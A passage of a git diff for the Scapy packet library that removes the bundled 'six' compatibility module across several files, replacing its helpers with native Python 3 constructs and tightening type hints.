3: - - `str` -> encoded to `bytes` - - `bytes` -> `bytes` - """ - if isinstance(s, binary_type): - return s - if isinstance(s, text_type): - return s.encode(encoding, errors) - raise TypeError("not expecting type '%s'" % type(s)) - - -def ensure_str(s, encoding='utf-8', errors='strict'): - """Coerce *s* to `str`. - - For Python 2: - - `unicode` -> encoded to `str` - - `str` -> `str` - - For Python 3: - - `str` -> `str` - - `bytes` -> decoded to `str` - """ - # Optimization: Fast return for the common case. - if type(s) is str: - return s - if PY2 and isinstance(s, text_type): - return s.encode(encoding, errors) - elif PY3 and isinstance(s, binary_type): - return s.decode(encoding, errors) - elif not isinstance(s, (text_type, binary_type)): - raise TypeError("not expecting type '%s'" % type(s)) - return s - - -def ensure_text(s, encoding='utf-8', errors='strict'): - """Coerce *s* to six.text_type. - - For Python 2: - - `unicode` -> `unicode` - - `str` -> `unicode` - - For Python 3: - - `str` -> `str` - - `bytes` -> decoded to `str` - """ - if isinstance(s, binary_type): - return s.decode(encoding, errors) - elif isinstance(s, text_type): - return s - else: - raise TypeError("not expecting type '%s'" % type(s)) - - -def python_2_unicode_compatible(klass): - """ - A class decorator that defines __unicode__ and __str__ methods under Python 2. - Under Python 3 it does nothing. - - To support Python 2 and 3 with a single code base, define a __str__ method - returning text and apply this decorator to the class. - """ - if PY2: - if '__str__' not in klass.__dict__: - raise ValueError("@python_2_unicode_compatible cannot be applied " - "to %s because it doesn't define __str__()." % - klass.__name__) - klass.__unicode__ = klass.__str__ - klass.__str__ = lambda self: self.__unicode__().encode('utf-8') - return klass - - -# Complete the moves implementation. -# This code is at the end of this module to speed up module loading. -# Turn this module into a package. -__path__ = [] # required for PEP 302 and PEP 451 -__package__ = __name__ # see PEP 366 @ReservedAssignment -if globals().get("__spec__") is not None: - __spec__.submodule_search_locations = [] # PEP 451 @UndefinedVariable -# Remove other six meta path importers, since they cause problems. This can -# happen if six is removed from sys.modules and then reloaded. (Setuptools does -# this for some reason.) -if sys.meta_path: - for i, importer in enumerate(sys.meta_path): - # Here's some real nastiness: Another "instance" of the six module might - # be floating around. Therefore, we can't use isinstance() to check for - # the six meta path importer, since the other six instance will have - # inserted an importer with different class. - if (type(importer).__name__ == "_SixMetaPathImporter" and - importer.name == __name__): - del sys.meta_path[i] - break - del i, importer -# Finally, add the importer to the meta path import hook. -sys.meta_path.append(_importer) diff --git a/scapy/main.py b/scapy/main.py index ea6f824da98..9d0dd6c6789 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -8,6 +8,7 @@ """ +import builtins import sys import os import getopt @@ -16,7 +17,9 @@ import glob import importlib import io +from itertools import zip_longest import logging +import pickle import types import warnings from random import choice @@ -28,7 +31,6 @@ log_loading, Scapy_Exception, ) -import scapy.libs.six as six from scapy.themes import DefaultTheme, BlackAndWhite, apply_ipython_style from scapy.consts import WINDOWS @@ -149,7 +151,7 @@ def _load(module, globals_dict=None, symb_list=None): """ if globals_dict is None: - globals_dict = six.moves.builtins.__dict__ + globals_dict = builtins.__dict__ try: mod = importlib.import_module(module) if '__all__' in mod.__dict__: @@ -160,7 +162,7 @@ def _load(module, globals_dict=None, symb_list=None): globals_dict[name] = mod.__dict__[name] else: # only import non-private symbols - for name, sym in six.iteritems(mod.__dict__): + for name, sym in mod.__dict__.items(): if _validate_local(name): if symb_list is not None: symb_list.append(name) @@ -300,11 +302,11 @@ def update_ipython_session(session): def _scapy_builtins(): # type: () -> Dict[str, Any] """Load Scapy and return all builtins""" - return {k: v - for k, v in six.iteritems( - importlib.import_module(".all", "scapy").__dict__.copy() - ) - if _validate_local(k)} + return { + k: v + for k, v in importlib.import_module(".all", "scapy").__dict__.copy().items() + if _validate_local(k) + } def save_session(fname="", session=None, pickleProto=-1): @@ -328,7 +330,7 @@ def save_session(fname="", session=None, pickleProto=-1): from IPython import get_ipython session = get_ipython().user_ns except Exception: - session = six.moves.builtins.__dict__["scapy_session"] + session = builtins.__dict__["scapy_session"] if not session: log_interactive.error("No session found ?!") @@ -360,7 +362,7 @@ def save_session(fname="", session=None, pickleProto=-1): pass f = gzip.open(fname, "wb") - six.moves.cPickle.dump(to_be_saved, f, pickleProto) + pickle.dump(to_be_saved, f, pickleProto) f.close() @@ -375,15 +377,15 @@ def load_session(fname=None): if fname is None: fname = conf.session try: - s = six.moves.cPickle.load(gzip.open(fname, "rb")) + s = pickle.load(gzip.open(fname, "rb")) except IOError: try: - s = six.moves.cPickle.load(open(fname, "rb")) + s = pickle.load(open(fname, "rb")) except IOError: # Raise "No such file exception" raise - scapy_session = six.moves.builtins.__dict__["scapy_session"] + scapy_session = builtins.__dict__["scapy_session"] s.update({k: scapy_session[k] for k in scapy_session["_scpybuiltins"]}) scapy_session.clear() scapy_session.update(s) @@ -402,10 +404,10 @@ def update_session(fname=None): if fname is None: fname = conf.session try: - s = six.moves.cPickle.load(gzip.open(fname, "rb")) + s = pickle.load(gzip.open(fname, "rb")) except IOError: - s = six.moves.cPickle.load(open(fname, "rb")) - scapy_session = six.moves.builtins.__dict__["scapy_session"] + s = pickle.load(open(fname, "rb")) + scapy_session = builtins.__dict__["scapy_session"] scapy_session.update(s) update_ipython_session(scapy_session) @@ -426,10 +428,9 @@ def init_session(session_name, # type: Optional[Union[str, None]] else: try: try: - SESSION = six.moves.cPickle.load(gzip.open(session_name, - "rb")) + SESSION = pickle.load(gzip.open(session_name, "rb")) except IOError: - SESSION = six.moves.cPickle.load(open(session_name, "rb")) + SESSION = pickle.load(open(session_name, "rb")) log_loading.info("Using existing session [%s]", session_name) except ValueError: msg = "Error opening Python3 pickled session on Python2 [%s]" @@ -458,10 +459,10 @@ def init_session(session_name, # type: Optional[Union[str, None]] SESSION.update(scapy_builtins) SESSION["_scpybuiltins"] = scapy_builtins.keys() - six.moves.builtins.__dict__["scapy_session"] = SESSION + builtins.__dict__["scapy_session"] = SESSION if mydict is not None: - six.moves.builtins.__dict__["scapy_session"].update(mydict) + builtins.__dict__["scapy_session"].update(mydict) update_ipython_session(mydict) if ret: return SESSION @@ -646,7 +647,7 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): the_banner.extend(_prepare_quote(quote, author, max_len=39)) the_banner.append(" |") banner_text = "\n".join( - logo + banner for logo, banner in six.moves.zip_longest( + logo + banner for logo, banner in zip_longest( (conf.color_theme.logo(line) for line in the_logo), (conf.color_theme.success(line) for line in the_banner), fillvalue="" diff --git a/scapy/modules/krack/crypto.py b/scapy/modules/krack/crypto.py index cfe2e1307e1..47b7c9364f1 100644 --- a/scapy/modules/krack/crypto.py +++ b/scapy/modules/krack/crypto.py @@ -10,7 +10,6 @@ from cryptography.hazmat.primitives.ciphers import Cipher, algorithms from cryptography.hazmat.backends import default_backend -import scapy.libs.six as six from scapy.compat import orb, chb from scapy.layers.dot11 import Dot11TKIP from scapy.utils import mac2str @@ -158,7 +157,7 @@ def gen_TKIP_RC4_key(TSC, TA, TK): assert len(TSC) == 6 assert len(TA) == 6 assert len(TK) == 16 - assert all(isinstance(x, six.integer_types) for x in TSC + TA + TK) + assert all(isinstance(x, int) for x in TSC + TA + TK) # Phase 1 # 802.11i p.54 diff --git a/scapy/modules/nmap.py b/scapy/modules/nmap.py index 3fc2e337d19..c00d7a43863 100644 --- a/scapy/modules/nmap.py +++ b/scapy/modules/nmap.py @@ -28,7 +28,6 @@ from scapy.sendrecv import sr from scapy.compat import plain_str, raw, Dict, List, Tuple, Optional, cast, Union from scapy.plist import SndRcvList, PacketList -import scapy.libs.six as six if WINDOWS: @@ -140,8 +139,7 @@ def nmap_udppacket_sig(snd, rcv): def nmap_match_one_sig(seen, ref): # type: (Dict, Dict) -> float - cnt = sum(val in ref.get(key, "").split("|") - for key, val in six.iteritems(seen)) + cnt = sum(val in ref.get(key, "").split("|") for key, val in seen.items()) if cnt == 0 and seen.get("Resp") == "N": return 0.7 return float(cnt) / len(seen) @@ -197,7 +195,7 @@ def nmap_search(sigs): conf.nmap_kdb = cast(NmapKnowledgeBase, conf.nmap_kdb) for osval, fprint in conf.nmap_kdb.get_base(): score = 0.0 - for test, values in six.iteritems(fprint): + for test, values in fprint.items(): if test in sigs: score += nmap_match_one_sig(sigs[test], values) score /= len(sigs) diff --git a/scapy/modules/p0f.py b/scapy/modules/p0f.py index 3adb04fe4bc..085462f61d4 100644 --- a/scapy/modules/p0f.py +++ b/scapy/modules/p0f.py @@ -20,7 +20,6 @@ from scapy.layers.inet6 import IPv6 from scapy.volatile import RandByte, RandShort, RandString from scapy.error import warning -from scapy.libs.six import integer_types, string_types _p0fpaths = ["/etc/p0f", "/usr/share/p0f", "/opt/local"] conf.p0f_base = select_path(_p0fpaths, "p0f.fp") @@ -776,7 +775,7 @@ def p0f_impersonate(pkt, osgenre=None, osdetails=None, signature=None, tcp_type = tcp.flags & (0x02 | 0x10) # SYN / SYN+ACK if signature: - if isinstance(signature, string_types): + if isinstance(signature, str): sig, _ = TCP_Signature.from_raw_sig(signature) else: raise TypeError("Unsupported signature type") @@ -832,7 +831,7 @@ def p0f_impersonate(pkt, osgenre=None, osdetails=None, signature=None, # Take the options already set as "hints" to use in the new packet if we # can. we'll use the already-set values if they're valid integers. def int_only(val): - return val if isinstance(val, integer_types) else None + return val if isinstance(val, int) else None orig_opts = dict(tcp.options) mss_hint = int_only(orig_opts.get("MSS")) ws_hint = int_only(orig_opts.get("WScale")) diff --git a/scapy/modules/p0fv2.py b/scapy/modules/p0fv2.py index 0a9e52cfbaf..353288b2bda 100644 --- a/scapy/modules/p0fv2.py +++ b/scapy/modules/p0fv2.py @@ -21,7 +21,6 @@ from scapy.error import warning, Scapy_Exception, log_runtime from scapy.volatile import RandInt, RandByte, RandNum, RandShort, RandString from scapy.sendrecv import sniff -from scapy.libs import six if conf.route is None: # unused import, only to initialize conf.route import scapy.route # noqa: F401 @@ -407,7 +406,7 @@ def p0f_impersonate(pkt, osgenre=None, osdetails=None, signature=None, # can. MSS, WScale and Timestamp can all be wildcarded in a signature, so # we'll use the already-set values if they're valid integers. orig_opts = dict(pkt.payload.options) - int_only = lambda val: val if isinstance(val, six.integer_types) else None + int_only = lambda val: val if isinstance(val, int) else None mss_hint = int_only(orig_opts.get('MSS')) wscale_hint = int_only(orig_opts.get('WScale')) ts_hint = [int_only(o) for o in orig_opts.get('Timestamp', (None, None))] diff --git a/scapy/packet.py b/scapy/packet.py index a8844ff7e7b..283e3364172 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -45,7 +45,6 @@ pretty_list, EDecimal from scapy.error import Scapy_Exception, log_runtime, warning from scapy.libs.test_pyx import PYX -import scapy.libs.six as six # Typing imports from scapy.compat import ( @@ -61,9 +60,11 @@ Type, TypeVar, Union, + Self, Sequence, cast, ) + try: import pyx except ImportError: @@ -73,9 +74,11 @@ _T = TypeVar("_T", Dict[str, Any], Optional[Dict[str, Any]]) -# six.with_metaclass typing is glitchy -class Packet(six.with_metaclass(Packet_metaclass, # type: ignore - BasePacket, _CanvasDumpExtended)): +class Packet( + BasePacket, + _CanvasDumpExtended, + metaclass=Packet_metaclass +): __slots__ = [ "time", "sent_time", "name", "default_fields", "fields", "fieldtype", @@ -117,13 +120,23 @@ def from_hexcap(cls): def upper_bonds(self): # type: () -> None for fval, upper in self.payload_guess: - print("%-20s %s" % (upper.__name__, ", ".join("%-12s" % ("%s=%r" % i) for i in six.iteritems(fval)))) # noqa: E501 + print( + "%-20s %s" % ( + upper.__name__, + ", ".join("%-12s" % ("%s=%r" % i) for i in fval.items()), + ) + ) @classmethod def lower_bonds(self): # type: () -> None - for lower, fval in six.iteritems(self._overload_fields): - print("%-20s %s" % (lower.__name__, ", ".join("%-12s" % ("%s=%r" % i) for i in six.iteritems(fval)))) # noqa: E501 + for lower, fval in self._overload_fields.items(): + print( + "%-20s %s" % ( + lower.__name__, + ", ".join("%-12s" % ("%s=%r" % i) for i in fval.items()), + ) + ) def __init__(self, _pkt=b"", # type: Union[bytes, bytearray] @@ -145,7 +158,7 @@ def __init__(self, self.fields = {} # type: Dict[str, Any] self.fieldtype = {} # type: Dict[str, AnyField] self.packetfields = [] # type: List[AnyField] - self.payload = NoPayload() + self.payload = NoPayload() # type: Packet self.init_fields() self.underlayer = _underlayer self.parent = _parent @@ -391,8 +404,7 @@ def remove_parent(self, other): point to the list owner packet.""" self.parent = None - def copy(self): - # type: () -> Packet + def copy(self) -> Self: """Returns a deep copy of the instance.""" clone = self.__class__() clone.fields = self.copy_fields_dict(self.fields) @@ -521,7 +533,7 @@ def _superdir(self): """ Return a list of slots and methods, including those from subclasses. """ - attrs = set() + attrs = set() # type: Set[str] cls = self.__class__ if hasattr(cls, '__all_slots__'): attrs.update(cls.__all_slots__) @@ -573,21 +585,16 @@ def __repr__(self): repr(self.payload), ct.punct(">")) - if six.PY2: - def __str__(self): - # type: () -> str - return self.build() - else: - def __str__(self): - # type: () -> str - return self.summary() + def __str__(self): + # type: () -> str + return self.summary() def __bytes__(self): # type: () -> bytes return self.build() def __div__(self, other): - # type: (Any) -> Packet + # type: (Any) -> Self if isinstance(other, Packet): cloneA = self.copy() cloneB = other.copy() @@ -636,7 +643,7 @@ def copy_fields_dict(self, fields): if fields is None: return None return {fname: self.copy_field_value(fname, fval) - for fname, fval in six.iteritems(fields)} + for fname, fval in fields.items()} def _raw_packet_cache_field_value(self, fld, val, copy=False): # type: (AnyField, Any, bool) -> Optional[Any] @@ -658,8 +665,8 @@ def clear_cache(self): # type: () -> None """Clear the raw packet cache for the field and all its subfields""" self.raw_packet_cache = None - for fld, fval in six.iteritems(self.fields): - fld = self.get_field(fld) + for fname, fval in self.fields.items(): + fld = self.get_field(fname) if fld.holds_packets: if isinstance(fval, Packet): fval.clear_cache() @@ -675,8 +682,9 @@ def self_build(self): :param field_pos_list: """ - if self.raw_packet_cache is not None: - for fname, fval in six.iteritems(self.raw_packet_cache_fields): + if self.raw_packet_cache is not None and \ + self.raw_packet_cache_fields is not None: + for fname, fval in self.raw_packet_cache_fields.items(): fld, val = self.getfield_and_val(fname) if self._raw_packet_cache_field_value(fld, val) != fval: self.raw_packet_cache = None @@ -1064,7 +1072,7 @@ def guess_payload_class(self, payload): for fval, cls in t.payload_guess: try: if all(v == self.getfieldval(k) - for k, v in six.iteritems(fval)): + for k, v in fval.items()): return cls # type: ignore except AttributeError: pass @@ -1085,7 +1093,7 @@ def hide_defaults(self): # type: () -> None """Removes fields' values that are the same as default values.""" # use list(): self.fields is modified in the loop - for k, v in list(six.iteritems(self.fields)): + for k, v in list(self.fields.items()): v = self.fields[k] if k in self.default_fields: if self.default_fields[k] == v: @@ -1148,8 +1156,8 @@ def loop(todo, done, self=self): todo = [] done = self.fields else: - todo = [k for (k, v) in itertools.chain(six.iteritems(self.default_fields), # noqa: E501 - six.iteritems(self.overloaded_fields)) # noqa: E501 + todo = [k for (k, v) in itertools.chain(self.default_fields.items(), + self.overloaded_fields.items()) if isinstance(v, VolatileValue)] + list(self.fields) done = {} return loop(todo, done) @@ -1290,7 +1298,7 @@ def getlayer(self, if not class_name or match(self.__class__, class_name) \ or class_name in [self.__class__.__name__, self._name]: if all(self.getfieldval(fldname) == fldvalue - for fldname, fldvalue in six.iteritems(flt)): + for fldname, fldvalue in flt.items()): if nb == 1: if fld is None: return self @@ -1658,7 +1666,7 @@ def command(self): obtain the same packet """ f = [] - for fn, fv in six.iteritems(self.fields): + for fn, fv in self.fields.items(): fld = self.get_field(fn) if isinstance(fv, (list, dict, set)) and len(fv) == 0: continue @@ -1687,12 +1695,12 @@ def command(self): class NoPayload(Packet): def __new__(cls, *args, **kargs): - # type: (Type[Packet], *Any, **Any) -> Packet + # type: (Type[Packet], *Any, **Any) -> NoPayload singl = cls.__dict__.get("__singl__") if singl is None: cls.__singl__ = singl = Packet.__new__(cls) Packet.__init__(singl) - return singl + return cast(NoPayload, singl) def __init__(self, *args, **kargs): # type: (*Any, **Any) -> None @@ -1806,7 +1814,7 @@ def hashret(self): return b"" def answers(self, other): - # type: (NoPayload) -> bool + # type: (Packet) -> bool return isinstance(other, (NoPayload, conf.padding_layer)) # noqa: E501 def haslayer(self, cls, _subclass=None): @@ -1955,7 +1963,7 @@ def bind_top_down(lower, # type: Type[Packet] """ if __fval is not None: fval.update(__fval) - upper._overload_fields = upper._overload_fields.copy() + upper._overload_fields = upper._overload_fields.copy() # type: ignore upper._overload_fields[lower] = fval @@ -1999,7 +2007,7 @@ def split_bottom_up(lower, # type: Type[Packet] def do_filter(params, cls): # type: (Dict[str, int], Type[Packet]) -> bool params_is_invalid = any( - k not in params or params[k] != v for k, v in six.iteritems(fval) + k not in params or params[k] != v for k, v in fval.items() ) return cls != upper or params_is_invalid lower.payload_guess = [x for x in lower.payload_guess if do_filter(*x)] @@ -2018,9 +2026,9 @@ def split_top_down(lower, # type: Type[Packet] fval.update(__fval) if lower in upper._overload_fields: ofval = upper._overload_fields[lower] - if any(k not in ofval or ofval[k] != v for k, v in six.iteritems(fval)): # noqa: E501 + if any(k not in ofval or ofval[k] != v for k, v in fval.items()): return - upper._overload_fields = upper._overload_fields.copy() + upper._overload_fields = upper._overload_fields.copy() # type: ignore del upper._overload_fields[lower] @@ -2087,17 +2095,15 @@ def explore(layer=None): call_ptk = lambda x: x.run() # type: ignore # 1 - Ask for layer or contrib btn_diag = button_dialog( - title=six.text_type("Scapy v%s" % conf.version), + title="Scapy v%s" % conf.version, text=HTML( - six.text_type( - '' - ) + '' ), buttons=[ - (six.text_type("Layers"), "layers"), - (six.text_type("Contribs"), "contribs"), - (six.text_type("Cancel"), "cancel") + ("Layers", "layers"), + ("Contribs", "contribs"), + ("Cancel", "cancel") ]) action = call_ptk(btn_diag) # 2 - Retrieve list of Packets @@ -2119,10 +2125,6 @@ def explore(layer=None): else: # Escape/Cancel was pressed return - # Python 2 compat - if six.PY2: - values = [(six.text_type(x), six.text_type(y)) - for x, y in values] # Build tree if action == "contribs": # A tree is a dictionary. Each layer contains a keyword @@ -2154,7 +2156,7 @@ def explore(layer=None): # Generate tests & form folders = list(current.keys()) _radio_values = [ - ("$" + name, six.text_type('[+] ' + name.capitalize())) + ("$" + name, str('[+] ' + name.capitalize())) for name in folders if not name.startswith("_") ] + current.get("_l", []) # type: List[str] cur_path = "" @@ -2171,15 +2173,13 @@ def explore(layer=None): # Show popup rd_diag = radiolist_dialog( values=_radio_values, - title=six.text_type( - "Scapy v%s" % conf.version - ), + title="Scapy v%s" % conf.version, text=HTML( - six.text_type(( + ( '' - ) + extra_text) + ) + extra_text ), cancel_text="Back" if previous else "Cancel" ) @@ -2238,7 +2238,7 @@ def explore(layer=None): # Print print(conf.color_theme.layer_name("Packets contained in %s:" % result)) rtlst = [] # type: List[Tuple[Union[str, List[str]], ...]] - rtlst = [(lay.__name__ or "", lay._name or "") for lay in all_layers] + rtlst = [(lay.__name__ or "", cast(str, lay._name) or "") for lay in all_layers] print(pretty_list(rtlst, [("Class", "Name")], borders=True)) @@ -2267,29 +2267,29 @@ def _pkt_ls(obj, # type: Union[Packet, Type[Packet]] name = cur_fld.name default = cur_fld.default if verbose and isinstance(cur_fld, EnumField) \ - and hasattr(cur_fld, "i2s"): + and hasattr(cur_fld, "i2s") and cur_fld.i2s: if len(cur_fld.i2s or []) < 50: long_attrs.extend( "%s: %d" % (strval, numval) for numval, strval in - sorted(six.iteritems(cur_fld.i2s)) + sorted(cur_fld.i2s.items()) ) elif isinstance(cur_fld, MultiEnumField): - fld_depend = cur_fld.depends_on( - cast(Packet, obj if is_pkt else obj()) - ) + if isinstance(obj, Packet): + obj_pkt = obj + else: + obj_pkt = obj() + fld_depend = cur_fld.depends_on(obj_pkt) attrs.append("Depends on %s" % fld_depend) if verbose: cur_i2s = cur_fld.i2s_multi.get( - cur_fld.depends_on( - cast(Packet, obj if is_pkt else obj()) - ), {} + cur_fld.depends_on(obj_pkt), {} ) if len(cur_i2s) < 50: long_attrs.extend( "%s: %d" % (strval, numval) for numval, strval in - sorted(six.iteritems(cur_i2s)) + sorted(cur_i2s.items()) ) elif verbose and isinstance(cur_fld, FlagsField): names = cur_fld.names @@ -2332,16 +2332,14 @@ def ls(obj=None, # type: Optional[Union[str, Packet, Type[Packet]]] :param case_sensitive: if obj is a string, is it case sensitive? :param verbose: """ - is_string = isinstance(obj, str) - - if obj is None or is_string: + if obj is None or isinstance(obj, str): tip = False if obj is None: tip = True all_layers = sorted(conf.layers, key=lambda x: x.__name__) else: pattern = re.compile( - cast(str, obj), + obj, 0 if case_sensitive else re.I ) # We first order by accuracy, then length @@ -2365,7 +2363,7 @@ def ls(obj=None, # type: Optional[Union[str, Packet, Type[Packet]]] else: try: fields = _pkt_ls( - obj, # type: ignore + obj, verbose=verbose ) is_pkt = isinstance(obj, Packet) @@ -2499,11 +2497,14 @@ def rfc(cls, ret=False, legend=True): # Fuzzing # ############# +_P = TypeVar('_P', bound=Packet) + + @conf.commands.register -def fuzz(p, # type: Packet +def fuzz(p, # type: _P _inplace=0, # type: int ): - # type: (...) -> Packet + # type: (...) -> _P """ Transform a layer into a fuzzy layer by replacing some default values by random objects. @@ -2513,7 +2514,7 @@ def fuzz(p, # type: Packet """ if not _inplace: p = p.copy() - q = p + q = cast(Packet, p) while not isinstance(q, NoPayload): new_default_fields = {} multiple_type_fields = [] # type: List[str] @@ -2534,7 +2535,7 @@ def fuzz(p, # type: Packet # freeze the other random values new_default_fields = { key: (val._fix() if isinstance(val, VolatileValue) else val) - for key, val in six.iteritems(new_default_fields) + for key, val in new_default_fields.items() } q.default_fields.update(new_default_fields) # add the random values of the MultipleTypeFields diff --git a/scapy/pipetool.py b/scapy/pipetool.py index 663940b20d5..49bfcc5e868 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -4,9 +4,9 @@ # Copyright (C) Philippe Biondi import os +import queue import subprocess import time -import scapy.libs.six as six from threading import Lock, Thread from scapy.automaton import ( @@ -30,7 +30,6 @@ Union, Type, TypeVar, - _Generic_metaclass, cast, ) @@ -235,7 +234,7 @@ def graph(self, **kargs): do_graph(graph, **kargs) -class _PipeMeta(_Generic_metaclass): +class _PipeMeta(type): def __new__(cls, name, # type: str bases, # type: Tuple[type, ...] @@ -252,8 +251,7 @@ def __new__(cls, _TS = TypeVar("_TS", bound="TriggerSink") -@six.add_metaclass(_PipeMeta) -class Pipe: +class Pipe(metaclass=_PipeMeta): def __init__(self, name=None): # type: (Optional[str]) -> None self.sources = set() # type: Set['Pipe'] @@ -786,7 +784,7 @@ class QueueSink(Sink): def __init__(self, name=None): # type: (Optional[str]) -> None Sink.__init__(self, name=name) - self.q = six.moves.queue.Queue() + self.q: queue.Queue[Any] = queue.Queue() def push(self, msg): # type: (Any) -> None @@ -814,7 +812,7 @@ def recv(self, block=True, timeout=None): """ try: return self.q.get(block=block, timeout=timeout) - except six.moves.queue.Empty: + except queue.Empty: return None diff --git a/scapy/plist.py b/scapy/plist.py index c7c5c4aae89..1449e014060 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -24,7 +24,6 @@ from scapy.utils import do_graph, hexdump, make_table, make_lined_table, \ make_tex_table, issubtype from functools import reduce -import scapy.libs.six as six # typings from scapy.compat import ( @@ -44,6 +43,11 @@ ) from scapy.packet import Packet +try: + import pyx +except ImportError: + pass + if TYPE_CHECKING: from scapy.libs.matplot import Line2D @@ -60,8 +64,7 @@ _Inner = TypeVar("_Inner", Packet, QueryAnswer) -@six.add_metaclass(PacketList_metaclass) -class _PacketList(Generic[_Inner]): +class _PacketList(Generic[_Inner], metaclass=PacketList_metaclass): __slots__ = ["stats", "res", "listname"] def __init__(self, @@ -402,11 +405,11 @@ def multiplot(self, kargs = MATPLOTLIB_DEFAULT_PLOT_KARGS if plot_xy: - lines = [plt.plot(*zip(*pl), **dict(kargs, label=k)) - for k, pl in six.iteritems(d)] + lines = [plt.plot(*list(zip(*pl)), **dict(kargs, label=k)) # type: ignore + for k, pl in d.items()] else: lines = [plt.plot(pl, **dict(kargs, label=k)) - for k, pl in six.iteritems(d)] + for k, pl in d.items()] plt.legend(loc="center right", bbox_to_anchor=(1.5, 0.5)) # Call show() if matplotlib is not inlined @@ -510,8 +513,8 @@ def _getsrcdst(pkt): raise TypeError() getsrcdst = _getsrcdst conv = {} # type: Dict[Tuple[Any, ...], Any] - for p in self.res: - p = self._elt2pkt(p) + for elt in self.res: + p = self._elt2pkt(elt) try: c = getsrcdst(p) except Exception: @@ -526,7 +529,7 @@ def _getsrcdst(pkt): else: conv[c] = conv.get(c, 0) + 1 gr = 'digraph "conv" {\n' - for (s, d), l in six.iteritems(conv): + for (s, d), l in conv.items(): gr += '\t "%s" -> "%s" [label="%s"]\n' % ( s, d, ', '.join(str(x) for x in l) if isinstance(l, set) else l ) @@ -585,9 +588,9 @@ def minmax(x): M = 1 return m, M - mins, maxs = minmax(x for x, _ in six.itervalues(sl)) - mine, maxe = minmax(x for x, _ in six.itervalues(el)) - mind, maxd = minmax(six.itervalues(dl)) + mins, maxs = minmax(x for x, _ in sl.values()) + mine, maxe = minmax(x for x, _ in el.values()) + mind, maxd = minmax(dl.values()) gr = 'digraph "afterglow" {\n\tedge [len=2.5];\n' @@ -619,13 +622,13 @@ def minmax(x): gr += "}" return do_graph(gr, **kargs) - def canvas_dump(self, **kargs): - # type: (Any) -> Any # Using Any since pyx is imported later - import pyx + def canvas_dump(self, layer_shift=0, rebuild=1): + # type: (int, int) -> 'pyx.canvas.canvas' d = pyx.document.document() len_res = len(self.res) for i, res in enumerate(self.res): - c = self._elt2pkt(res).canvas_dump(**kargs) + c = self._elt2pkt(res).canvas_dump(layer_shift=layer_shift, + rebuild=rebuild) cbb = c.bbox() c.text(cbb.left(), cbb.top() + 1, r"\font\cmssfont=cmss12\cmssfont{Frame %i/%i}" % (i, len_res), [pyx.text.size.LARGE]) # noqa: E501 if conf.verb >= 2: diff --git a/scapy/scapypipes.py b/scapy/scapypipes.py index 7196e3af51f..4d61278eca8 100644 --- a/scapy/scapypipes.py +++ b/scapy/scapypipes.py @@ -3,10 +3,10 @@ # See https://scapy.net/ for more information # Copyright (C) Philippe Biondi +from queue import Queue, Empty import socket import subprocess -from scapy.libs.six.moves.queue import Queue, Empty from scapy.automaton import ObjectPipe from scapy.config import conf from scapy.compat import raw @@ -381,7 +381,7 @@ def stop(self): self.fd.close() def push(self, msg): - # type: (Packet) -> None + # type: (bytes) -> None self.fd.send(msg) def fileno(self): @@ -417,7 +417,7 @@ def __init__(self, addr="", port=0, name=None): # type: (str, int, Optional[str]) -> None TCPConnectPipe.__init__(self, addr, port, name) self.connected = False - self.q = Queue() + self.q: Queue[Any] = Queue() def start(self): # type: () -> None @@ -428,7 +428,7 @@ def start(self): self.fd.listen(1) def push(self, msg): - # type: (Packet) -> None + # type: (bytes) -> None if self.connected: self.fd.send(msg) else: @@ -483,7 +483,7 @@ def start(self): self.connected = True def push(self, msg): - # type: (Packet) -> None + # type: (bytes) -> None self.fd.send(msg) def deliver(self): @@ -523,7 +523,7 @@ def start(self): self.fd.bind((self.addr, self.port)) def push(self, msg): - # type: (Packet) -> None + # type: (bytes) -> None if self._destination: self.fd.sendto(msg, self._destination) else: @@ -659,7 +659,7 @@ def __init__(self, start_state=True, name=None): # type: (bool, Optional[Any]) -> None Drain.__init__(self, name=name) self.opened = start_state - self.q = Queue() + self.q: Queue[Any] = Queue() def start(self): # type: () -> None diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index c7ad44bd20b..95c34cae66c 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -33,7 +33,6 @@ ) from scapy.error import log_runtime, log_interactive, Scapy_Exception from scapy.base_classes import Gen, SetGen -from scapy.libs import six from scapy.sessions import DefaultSession from scapy.supersocket import SuperSocket, IterSocket @@ -189,11 +188,11 @@ def __init__(self, if multi: remain = [ - p for p in itertools.chain(*six.itervalues(self.hsent)) + p for p in itertools.chain(*self.hsent.values()) if not hasattr(p, '_answered') ] else: - remain = list(itertools.chain(*six.itervalues(self.hsent))) + remain = list(itertools.chain(*self.hsent.values())) if autostop and len(remain) > 0 and \ len(remain) != len(self.tobesent): @@ -655,7 +654,7 @@ def sr(x, # type: _PacketIterable @conf.commands.register def sr1(*args, **kargs): - # type: (*Packet, **Any) -> Optional[Packet] + # type: (*Any, **Any) -> Optional[Packet] """ Send packets at layer 3 and return only the first answer """ @@ -666,7 +665,7 @@ def sr1(*args, **kargs): @conf.commands.register -def srp(x, # type: Packet +def srp(x, # type: _PacketIterable promisc=None, # type: Optional[bool] iface=None, # type: Optional[_GlobInterfaceType] iface_hint=None, # type: Optional[str] @@ -692,7 +691,7 @@ def srp(x, # type: Packet @conf.commands.register def srp1(*args, **kargs): - # type: (*Packet, **Any) -> Optional[Packet] + # type: (*Any, **Any) -> Optional[Packet] """ Send and receive packets at layer 2 and return only the first answer """ @@ -713,8 +712,8 @@ def srp1(*args, **kargs): def __sr_loop(srfunc, # type: Callable[..., Tuple[SndRcvList, PacketList]] pkts, # type: _PacketIterable - prn=lambda x: x[1].summary(), # type: Callable[[QueryAnswer], Any] # noqa: E501 - prnfail=lambda x: x.summary(), # type: Callable[[Packet], Any] + prn=lambda x: x[1].summary(), # type: Optional[Callable[[QueryAnswer], Any]] # noqa: E501 + prnfail=lambda x: x.summary(), # type: Optional[Callable[[Packet], Any]] inter=1, # type: int timeout=None, # type: Optional[int] count=None, # type: Optional[int] @@ -751,17 +750,19 @@ def __sr_loop(srfunc, # type: Callable[..., Tuple[SndRcvList, PacketList]] if verbose > 1 and prn and len(res[0]) > 0: msg = "RECV %i:" % len(res[0]) print("\r" + ct.success(msg), end=' ') - for p in res[0]: - print(col(prn(p))) + for rcv in res[0]: + print(col(prn(rcv))) print(" " * len(msg), end=' ') if verbose > 1 and prnfail and 